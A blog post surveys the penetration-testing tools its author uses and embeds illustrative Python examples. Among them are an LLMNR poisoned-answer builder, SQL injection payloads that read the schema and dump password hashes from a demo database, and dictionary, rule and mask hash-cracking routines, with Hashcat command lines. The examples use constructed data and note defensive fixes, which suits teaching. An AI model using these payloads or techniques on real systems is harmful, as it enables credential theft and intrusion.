The official blog belonging to Anthony Kwok
To all future pentesters out there, this is the current suite of tools I use and have familiarity with.
Note: This list is not all inclusive (no Hak5 tools in this list). I recommend knowing how these tools work and being able to work the ins and outs of each tool. Proficiency comes from practice and use. The more familiar you become with these tools, the easier it'll be for you down the line in your hacking or pentesting career. I currently do not have any Hak5 tools although I do plan on acquiring a full Hak5 set in the future. I highly recommend you are familiar with command line. I will be writing a future post on a tutorial for Linux command line and resources that helped me develop command line proficiency. I also recommend having sufficient knowledge in networking, primarily understanding the OSI Model and understanding TCP/IP, UDP, and subnets. All tools in this list are what I actually use when I conduct a pentest, although some tools I use more frequently than others.
Let's Get Down to It. In No Particular Order
1. Kali Linux
I currently use Kali Linux build 2019.3. I do not like the new GUI in build 2019.4 and later. Kali Linux is nice because it includes a plethora of tools and it all comes in the distro, meaning you do not have to download more tools. The biggest downside is that it's a bit overwhelming for first time users. It is not an intuitive distro and despite it having a GUI, you will be spending most of your time in the terminal. All tools in this list are built into Kali Linux unless otherwise stated. I have integrated all of these tools in my Kali Linux VM and I suggest you do the same. Download links are in the headers.
2. Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. I use this when I'm serious about testing web apps. The community version (free version) is native to Kali but the professional license, which is priced at $399 per year is a bit costly for the entry pentester. Although if you're primarily going to be a web pentester, I strongly recommend paying for the full version.
3. Nessus / OpenVAS
Nessus and OpenVAS (Open Vulnerability Assessment Scanner) are the two vulnerability scanners I use. They share a lineage: OpenVAS was forked from Nessus when Nessus went closed source in 2005, so Nessus is the commercial product and OpenVAS is the open-source one, not the other way around. You can get a free license which allows scanning of 16 IP addresses by registering for Nessus Essentials, or set up an OpenVAS environment on your Kali distro, which allows scanning of an unlimited number of IP addresses. Both scan machines and report the vulnerabilities found on them, with a severity rating and references for each finding. It's a must have to make your life a lot easier and conduct efficient pentests, with one caveat: a scanner only reports what its plugins can fingerprint, so confirm findings by hand before they go in a report. Nessus is not native to Kali; you register a license, download the .deb package and install it with dpkg.
4. Metasploit
Metasploit is a framework that catalogs security vulnerabilities and aids in pentesting by giving you modules to scan for or exploit them, plus payloads to run once an exploit lands. I use Metasploit constantly. It's very robust and versatile. Knowing the ins and outs of this framework is a must for any offensive security professional. I mainly use this for exploits, enumeration, and scanning.
5. Nmap
Nmap, aka Network Mapper, is a tool that allows you to conduct network scans against IP addresses or subnets (ranges of IP addresses). This tool will allow you to target specific machines and gather external information such as which ports are open, what services are running on those ports (with version detection via -sV), and what operating system is hosting them (-O). It is also a very useful tool for host discovery, because many hosts block ICMP, so pinging the machine tells you nothing; nmap can skip the ping and probe the ports directly with -Pn.
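Nmap's greppable output (-oG) is the format I feed into scripts, so here is a small Python parser for it. This is an added example, not from the original post or from the Nmap project; the scan result embedded below is constructed in the real -oG layout (one tab-separated `Host:` line per host, each `Ports:` entry as port/state/proto/owner/service/rpc/version/), and the IP addresses and banners in it are made up.

```python
"""Parse Nmap greppable output (-oG) into a host -> open ports map.

Added example, not from the original post. SAMPLE_GNMAP is a constructed
scan result in the real -oG layout: one 'Host:' line per host with tab-
separated 'Key: value' fields; each entry in 'Ports:' is
port/state/proto/owner/service/rpc/version/. Hosts and banners are made up.
"""

SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -Pn -sV -oG scan.gnmap 10.0.0.0/29
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)/, 80/open/tcp//http//nginx 1.14.2/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 10.0.0.6 ()\tStatus: Up
Host: 10.0.0.6 ()\tPorts: 445/open/tcp//microsoft-ds//Windows Server 2016 Standard 14393 microsoft-ds/\tIgnored State: closed (999)
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 22/closed/tcp//ssh///\tIgnored State: filtered (999)
# Nmap done -- 8 IP addresses (3 hosts up) scanned in 12.34 seconds
"""


def parse_gnmap(text):
    """Return {ip: [(port, proto, service, version), ...]} keeping open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                  # skip the '# Nmap ...' banner lines
        fields = {}
        for field in line.split("\t"):
            key, _, value = field.partition(": ")
            fields[key] = value
        ip = fields["Host"].split()[0]                # 'Host: 10.0.0.5 (name)' -> '10.0.0.5'
        hosts.setdefault(ip, [])
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            port, state, proto, _owner, service, _rpc, version = entry.split("/")[:7]
            if state == "open":
                hosts[ip].append((int(port), proto, service, version))
    return hosts


def hosts_running(hosts, service):
    """IPs exposing a given Nmap service name (e.g. 'microsoft-ds' for SMB)."""
    return sorted(ip for ip, ports in hosts.items()
                  if any(svc == service for _, _, svc, _ in ports))


def summary(hosts):
    """One 'ip:port/proto service version' line per open port, sorted so two
    scans of the same range can be diffed."""
    lines = []
    for ip in sorted(hosts, key=lambda a: tuple(int(o) for o in a.split("."))):
        for port, proto, service, version in sorted(hosts[ip]):
            lines.append(f"{ip}:{port}/{proto} {service} {version}".rstrip())
    return lines


if __name__ == "__main__":
    print("\n".join(summary(parse_gnmap(SAMPLE_GNMAP))))
```

The `hosts_running` helper is the bridge to the Active Directory tools later in this list: the hosts it returns for `microsoft-ds` are the ones worth pointing CrackMapExec at.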
6. Aircrack-ng
Aircrack-ng is the one stop shop to break WiFi. It is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security:
1. Monitoring: packet capture and export of data to text files for further processing by third party tools
2. Attacking: replay attacks, deauthentication, fake access points and others via packet injection
3. Testing: checking WiFi cards and driver capabilities (capture and injection)
4. Cracking: WEP and WPA PSK (WPA 1 and 2)
All tools are command line, which allows for heavy scripting. You will need a wireless adapter whose driver supports monitor mode and packet injection; many built-in laptop cards do not, so check yours with the testing tools before an engagement.
7. Cherry Tree
A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. This is what I use to take notes. It allows me to log data down and proper notekeeping is important when you're reporting bugs or vulnerabilities to the system maintainer(s).
8. Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It captures the traffic passing through a network interface on your machine. I use it to capture traffic going to and from a device or machine, primarily for the intent of password sniffing. That only yields credentials for protocols that send them in the clear (HTTP Basic, FTP, Telnet, SNMPv1/v2c) or as hashes you can crack offline, but even on a network where everything is encrypted, the DNS, ARP and broadcast traffic tells you a lot about what is there. It is a must have in a pentester's arsenal.
9. Nikto
Nikto is an open source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of servers, and version specific problems on web servers. It also checks for server configuration items such as the presence of multiple index files and HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. However, Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible and is obvious in log files or to an IPS/IDS. There is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS). Not every check is a security problem, though most are. Some items are "info only" checks that look for things that may not be a security flaw but that the webmaster or security engineer may not know are present on the server; these are marked appropriately in the output. There are also some checks for unknown items which have been seen scanned for in log files. Overall, this tool is really great for actively scanning and attacking web servers.
10. CrackMapExec
CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. It is primarily used for pass-the-hash attacks and password spraying in Windows AD environments, and for quickly checking which hosts a given credential has local admin on. This tool is not built into Kali by default (at least in the build I am using).
11. BloodHound
BloodHound is an open source application used for analyzing the security of Active Directory domains. The tool is built on graph theory and Active Directory object permissions. It ingests data collected from Active Directory domains (group memberships, local admin rights, logged-on sessions, ACLs) and highlights the potential for escalation of rights, thus uncovering hidden or complex attack paths that can compromise the security of a network. I will have a future blog post on how to set up and use BloodHound to find domain admins in Active Directory. Not native to Kali, you can download it
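To show what "inspired by graph theory" means in practice, here is the core of what BloodHound does once the data is ingested: a breadth-first search over AD relationships to find the shortest path to Domain Admins. This is an added example in Python, not BloodHound's own code; the domain, principals and edges are constructed for illustration and are not real collector output.

```python
"""Finding an attack path to Domain Admins over a BloodHound-style graph.

Added example, not BloodHound's code. BloodHound stores AD objects as nodes and
relationships (MemberOf, AdminTo, HasSession, ...) as directed edges; a path
to Domain Admins is a breadth-first search over those edges. The domain,
principals and edges below are constructed, not collector output."""
from collections import defaultdict, deque

DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"

# (source, relationship, target): "source can get to target via relationship".
EDGES = [
    ("JDOE@CORP.LOCAL",      "MemberOf",   "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL",  "AdminTo",    "WS01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL",  "AdminTo",    "WS02.CORP.LOCAL"),     # nobody interesting logged on
    ("WS01.CORP.LOCAL",      "HasSession", "ASMITH@CORP.LOCAL"),   # local admin can dump her creds
    ("ASMITH@CORP.LOCAL",    "MemberOf",   "IT ADMINS@CORP.LOCAL"),
    ("IT ADMINS@CORP.LOCAL", "MemberOf",   DOMAIN_ADMINS),
    ("BJONES@CORP.LOCAL",    "MemberOf",   "SALES@CORP.LOCAL"),
]
USERS = ["JDOE@CORP.LOCAL", "ASMITH@CORP.LOCAL", "BJONES@CORP.LOCAL"]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = defaultdict(list)
    for src, rel, dst in edges:
        graph[src].append((rel, dst))
    return graph


def shortest_path(graph, start, target=DOMAIN_ADMINS):
    """BFS from start; returns hops [(node, relationship, next_node), ...] or
    None when no path exists. Fewest hops is what you execute first on an
    engagement and what the client should fix first."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if target not in parent:
        return None
    hops, node = [], target
    while parent[node] is not None:
        prev, rel = parent[node]
        hops.append((prev, rel, node))
        node = prev
    return hops[::-1]


def render(hops):
    """'JDOE -MemberOf-> HELPDESK -AdminTo-> WS01 ...' for the report."""
    short = lambda n: n.split("@")[0].split(".")[0]
    out = short(hops[0][0])
    for _, rel, dst in hops:
        out += f" -{rel}-> {short(dst)}"
    return out


def users_reaching(graph, users, target=DOMAIN_ADMINS):
    """Which starting users have any path at all: the list you want short."""
    return [u for u in users if shortest_path(graph, u, target) is not None]


if __name__ == "__main__":
    g = build_graph(EDGES)
    for user in USERS:
        path = shortest_path(g, user)
        print(user, "->", render(path) if path else "no path")
```

The real tool does the same search in Neo4j with Cypher, over tens of thousands of nodes; the semantics of each hop (AdminTo means "can dump LSASS there", HasSession means "that user's credentials are in memory there") are what turn the graph result into a sequence of Mimikatz and pass-the-hash steps.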
12. Cobalt Strike
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers. This is not compliance testing. Cobalt Strike's system profiler discovers which client-side applications your target uses, with version information. I personally do not use this tool often since it costs a lot and you can actually do solid pentesting without it however, many pentesting companies do use cobalt strike in their arsenal, which is why this tool made it on my list. Not native to Kali
13. Meterpreter
This is the payload inside of Metasploit. Metasploit as a framework comes with a lot of tools: its exploit modules are what get you initial code execution on a target, and Meterpreter is the payload you hand to them, the code that runs once the exploit lands and gives you an interactive session. Meterpreter allows an attacker to control a victim's computer by running an invisible shell and establishing a communication channel back to the attacking machine. Its power and versatility have made it a favorite among pentesters, and clearly these qualities have made it equally attractive to bad actors. Meterpreter has all the "basic" features one would expect from a penetration testing tool. These include access to a command shell, running executables, sending and receiving files and profiling the network. However, it can do much more than that. Taking screenshots, keylogging, port forwarding and privilege escalation are only a few of its capabilities. Moreover, it can load various in-memory modules such as Mimikatz (the kiwi extension) for dumping hashes and plaintext passwords. When delivered in memory by an exploit, Meterpreter resides entirely in memory, writes nothing to disk, and creates no new processes; instead, it injects itself into compromised processes and can also migrate from one to another as necessary (a standalone Meterpreter executable generated with msfvenom is, of course, a file on disk and a process of its own). These features make it an attractive payload for APTs that prioritize staying under the radar. This is another must have tool in a hacker/pentester's arsenal.
14. Responder
Responder is first an LLMNR and NBT-NS responder: it will answer *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool only answers File Server Service requests, which is for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer the Workstation Service request name suffix. Responder is a powerful tool for quickly gaining credentials and possibly even remote system access. It is an LLMNR, NBT-NS and mDNS poisoner that is easy to use and very effective against vulnerable networks. Responder works by imitating several services and offering them to the network. Once a Windows system is tricked into communicating with Responder via one of these services, or when a mistyped UNC share name is searched for on the LAN, Responder answers the name request with its own IP, the victim authenticates to it, and Responder grabs the username and NetNTLM hash and logs them. Responder can also prompt users for credentials when certain network services are requested, resulting in clear text passwords. With its MultiRelay component it can also relay those authentications to other hosts (pass-the-hash style attacks) and provide remote shells. It is designed to target Active Directory. I will also have a future blog post on how to use Responder on its own and then combining it with BloodHound to show you how to pwn/own AD.
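The poisoning step above is simple enough to show on the wire. The following is an added example in Python, not Responder's code: it builds the LLMNR query a Windows host multicasts when DNS cannot resolve a name, then builds and parses the poisoned answer Responder sends back. LLMNR reuses the DNS message format (RFC 4795) over UDP 5355 to 224.0.0.252; the mistyped host name, transaction ID and attacker IP below are constructed, and no packets are actually sent.

```python
"""LLMNR query and poisoned answer, the exchange Responder performs.

Added example, not Responder's code. LLMNR (RFC 4795) reuses the DNS wire
format over UDP 5355 to multicast 224.0.0.252. The host name, transaction ID
and attacker address used here are constructed; nothing is sent."""
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355


def encode_name(name):
    """Host name -> DNS label sequence (length-prefixed labels, zero terminator)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf, off):
    """Read a label sequence at buf[off], following compression pointers."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                      # 11xxxxxx: pointer into the packet
            ptr = ((n & 0x3F) << 8) | buf[off]
            off += 1
            tail, _ = decode_name(buf, ptr)
            labels.append(tail)
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid, name, qtype=1):
    """What the victim multicasts after DNS fails: one A question, flags 0."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # ID, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(buf):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    name, off = decode_name(buf, 12)
    qtype, qclass = struct.unpack("!HH", buf[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_answer(query, attacker_ip, ttl=30):
    """Responder's move: echo the ID and question, add one A record -> attacker."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)   # QR=1, NOERROR
    question = encode_name(q["name"]) + struct.pack("!HH", q["qtype"], 1)
    answer = (struct.pack("!H", 0xC00C)                    # pointer to the name at offset 12
              + struct.pack("!HHIH", 1, 1, ttl, 4)         # type A, class IN, TTL, RDLENGTH
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_answer(buf):
    """Return (txid, is_response, [(name, ipv4, ttl), ...]) from a reply."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    _, off = decode_name(buf, 12)
    off += 4                                               # skip QTYPE/QCLASS
    records = []
    for _ in range(an):
        name, off = decode_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata, off = buf[off:off + rdlen], off + rdlen
        if rtype == 1:
            records.append((name, socket.inet_ntoa(rdata), ttl))
    return txid, bool(flags & 0x8000), records


def exchange(mistyped_host="fileshare01", attacker_ip="10.0.0.66", txid=0x1A2B):
    """Both sides of the exchange. The victim would next open SMB to attacker_ip
    and authenticate, handing over an NTLMv2 challenge/response."""
    query = build_query(txid, mistyped_host)
    reply = build_poisoned_answer(query, attacker_ip)
    return parse_answer(reply)
```

The defensive reading of the same exchange: the victim accepted an answer from whoever replied first, so the fix is to stop asking (disable LLMNR and NBT-NS via Group Policy) and to make the captured authentication useless for relaying (require SMB signing).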
15. Mimikatz
Another great tool to attack Active Directory, and a staple of the Kerberoasting workflow, since it can export Kerberos service tickets from memory for offline cracking. Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other attacks it enables are pass-the-hash, pass-the-ticket and forging Golden Tickets. This makes post-exploitation lateral movement within a network easy for attackers. It is an essential tool for privilege escalation in Windows environments; note that reading LSASS requires local admin or SYSTEM on the box, so it is what you run after you have a foothold, not before.
16. Hunter
Hunter is the leading solution to find and verify professional email addresses. I use it primarily for email address and username enumeration. It is a very handy tool for seeing the naming convention a company or organization uses for usernames (first.last, flast, and so on), which you need before any password spraying, and a tool I often use when conducting OSINT.
17. mitm6
Man in the Middle IPv6. One of my personal favorites, since IPv6 isn't as mainstream as IPv4. However, oddly enough, most organizations only have firewall rules protecting them from IPv4 addresses (BHR ACLs have to have both the IPv4 and IPv6 address in order to block the machine entirely). Sure, in Linux it is a one-line command to disable IPv6, but most people do not type that command, and Windows prefers IPv6 over IPv4 by default. mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with an IPv6 address and setting the attacker's host as the default DNS server. As the DNS server, mitm6 will selectively reply to DNS queries of the attacker's choosing and redirect the victim's traffic to the attacker machine instead of the legitimate server. For a full explanation of the attack, see the blog post about mitm6. mitm6 is designed to work together with ntlmrelayx from impacket for WPAD (Web Proxy Auto-Discovery) spoofing and credential relaying. Not native to Kali; install it from the project's page.
18. SQLmap
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Nothing more to it. This tool alone can give a pentester the power to become a backend developer's worst nightmare.
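To make concrete what sqlmap is detecting and exploiting, here is the flaw next to its fix, as an added example in Python (not sqlmap's code): a lookup that pastes user input into the SQL string, the same lookup with a bound parameter, and the boolean-based check sqlmap runs to tell them apart. The users table, its rows and the hash placeholders are constructed for the example.

```python
"""The flaw sqlmap finds and exploits: SQL built from user input, next to the
parameterized query that closes it. Added example, not sqlmap's code; the
table, rows and hash placeholders are constructed."""
import sqlite3


def setup():
    """In-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, role TEXT, pw_hash TEXT);
        INSERT INTO users VALUES ('alice', 'admin', 'hash-of-alice-pw');
        INSERT INTO users VALUES ('bob',   'user',  'hash-of-bob-pw');
        INSERT INTO users VALUES ('carol', 'user',  'hash-of-carol-pw');
    """)
    return conn


def lookup_vulnerable(conn, username):
    """The classic bug: the input becomes part of the statement text."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Bound parameter: the value travels separately and can never become SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Payloads of the kinds sqlmap tries, each one proving a little more.
TAUTOLOGY    = "' OR '1'='1"                                     # defeat the WHERE clause
UNION_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"  # fingerprint the schema
UNION_DUMP   = "' UNION SELECT username, pw_hash FROM users --"  # pull the hashes out


def is_injectable(lookup, conn, known="alice"):
    """sqlmap's boolean-based detection: append a TRUE and a FALSE condition to
    a known-good value; if input reaches the SQL, the two results differ."""
    true_case = lookup(conn, f"{known}' AND '1'='1")
    false_case = lookup(conn, f"{known}' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = setup()
    print("vulnerable:", is_injectable(lookup_vulnerable, db), lookup_vulnerable(db, UNION_DUMP))
    print("safe:      ", is_injectable(lookup_safe, db), lookup_safe(db, UNION_DUMP))
```

The order of the payloads mirrors an engagement: confirm injection with the boolean pair, enumerate the schema, then dump. The parameterized version returns nothing for every payload because the whole string is compared as a username and never parsed as SQL.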
19. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus hundreds of additional hashes and ciphers in "-jumbo" versions. The practical difference between the two crackers I use is that John is the more forgiving tool (it auto-detects common hash formats and ships with the *2john scripts that turn password-protected archives, documents and SSH keys into crackable hashes), while Hashcat is built around GPU acceleration and is the faster choice once the keyspace gets large. I recommend using John for passwords that are between 1-8 characters and Hashcat for passwords longer than 8 characters.
20. OSINT Framework
OSINT Framework is a collection of OSINT resources, focused on gathering information from free tools or sites. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost. This framework was originally created from an information security point of view. Since then, the response from other fields and disciplines has been incredible. This is a collection of tools to conduct information gathering and reconnaissance.
21. Social-Engineer Toolkit (SET)
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. This tool is standard issue in a pentester's arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
22. Bluto
Bluto does email address enumeration based on the target domain, currently using the Bing and Google search engines plus gathering data from the Email Hunter service and LinkedIn. https://haveibeenpwned.com/ is then used to identify whether any of the email addresses have appeared in a breach. Search engine queries are configured to use a random User-Agent on each request, and Bluto does a country lookup to select the fastest Google server relative to your egress address. Each request closes the connection in an attempt to further avoid captchas; however, excessive lookups will still result in captchas (Bluto will warn you if any are identified).
23. Shodan
Shodan is a search engine that lets the user find specific types of computers connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are the metadata that a server sends back to the client. Shodan allows you to search for exposed or vulnerable machines. I frequently check my own machines against Shodan to make sure none of my home servers are on it.
24. DirBuster
DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. It is often the case now that what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However, tools of this nature are often only as good as the directory and file list they come with. A different approach was taken to generating this one: the list was generated from scratch by crawling the Internet and collecting the directories and files that are actually used by developers. DirBuster comes with a total of 9 different lists, which makes it extremely effective at finding those hidden files and directories. And if that was not enough, DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide. Like Nikto, it is loud: expect every guess to land in the target's access log.
25. Hashcat
Hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. Hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking. It's a password cracker's dream. To be clear about what it does: a password hash (MD5, SHA-1, NTLM, bcrypt and so on) is the output of a one-way function, easy to compute and infeasible to reverse, and unlike encryption there is no key that turns the hash back into the password. Hashcat does not reverse anything. It guesses candidate passwords, hashes each one the same way the target system did, and compares the result with the hashes you gave it. Its five attack modes are just different ways of generating those candidates: straight (a wordlist), combinator (two wordlists joined), brute-force/mask (every string matching a pattern such as ?u?l?l?l?d?d), and two hybrid modes (wordlist + mask, mask + wordlist), with rule files that mutate wordlist entries on the fly. It does not use rainbow tables; GPUs that hash billions of candidates per second, and the salts on any modern hash format, made those obsolete.
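The three candidate generators that both John and Hashcat are built around (wordlist, wordlist plus rules, mask) fit in a few dozen lines, so here they are as an added Python example covering the John the Ripper and Hashcat entries above. This is not either tool's code: the rule syntax implemented is a small subset of theirs, the target hashes are MD5 (hashcat mode 0) of constructed passwords, and the wordlist is constructed; in practice you feed rockyou.txt and a real rule file.

```python
"""Dictionary, rule and mask attacks in miniature, the candidate generators
John the Ripper and Hashcat are built around. Added example, not either
tool's code. Targets are MD5 (hashcat -m 0) of constructed passwords and the
wordlist is constructed; real runs use rockyou.txt and a full rule file."""
import hashlib
import itertools


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


# A dumped credential file, constructed: three weak choices and one passphrase.
TARGETS = {md5(p) for p in ("summer2020", "Welcome!", "0427", "correct horse battery staple")}

WORDLIST = ["password", "summer", "welcome", "letmein"]
# Subset of hashcat/John rule syntax: ':' no-op, 'c' capitalize, 'u' upper,
# 'l' lower, '$X' append X, '^X' prepend X.
RULES = (":", "c", "u", "$2$0$2$0", "c$!", "$1")


def apply_rule(word, rule):
    """Mutate one wordlist entry according to a rule string."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op in "$^":
            i += 1
            word = word + rule[i] if op == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule op {op!r}")
        i += 1
    return word


def straight_attack(targets, wordlist, rules=(":",)):
    """hashcat -a 0 [-r rules]: hash each (mutated) word and look the digest up."""
    found = {}
    for word in wordlist:
        for rule in rules:
            candidate = apply_rule(word, rule)
            digest = md5(candidate)
            if digest in targets:
                found[digest] = candidate
    return found


MASK_CHARSETS = {"?d": "0123456789", "?l": "abcdefghijklmnopqrstuvwxyz",
                 "?u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "?s": "!@#$%^&*"}


def mask_attack(targets, mask):
    """hashcat -a 3: every string matching the mask, e.g. '?d?d?d?d' is 10^4 PINs."""
    charsets = [MASK_CHARSETS[mask[i:i + 2]] for i in range(0, len(mask), 2)]
    found = {}
    for combo in itertools.product(*charsets):
        candidate = "".join(combo)
        digest = md5(candidate)
        if digest in targets:
            found[digest] = candidate
    return found


def crack(targets):
    """Cheap attacks first, widest keyspace last. Whatever survives is the
    passphrase, which none of these candidate generators will reach."""
    found = straight_attack(targets, WORDLIST, RULES)
    found.update(mask_attack(targets - set(found), "?d?d?d?d"))
    return found


if __name__ == "__main__":
    cracked = crack(TARGETS)
    for digest in sorted(TARGETS):
        print(digest, cracked.get(digest, "<not cracked>"))
```

The equivalent real invocation is `hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule` for the first pass and `hashcat -m 0 -a 3 hashes.txt ?d?d?d?d` for the mask pass; the order here (rules before masks) is the same one you would use on a GPU, because the rule pass is cheap and usually takes the bulk of the list.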
26. theHarvester
theHarvester is a very simple to use, yet powerful and effective tool designed to be used in the early stages of a penetration test or red team engagement. Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet. The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and the Shodan database. This tool is intended to help penetration testers in the early stages of an engagement understand the customer's footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
I highly recommend proficiency in Python since a lot of scripting can be written in Python. If you want more versatility than bash but still run effective and powerful scripts, Python is the way to go.
I want to give a huge shoutout to TheCyberMentor (Heath Adams) for being the Richard Stallman of Cyber Security. I started my offensive security path with his Zero to Hero course. Happy Hacking. If there are any tools that aren't on this list that should be (excluding Hak5), please DM me on my socials and I'll correct it if I see fit.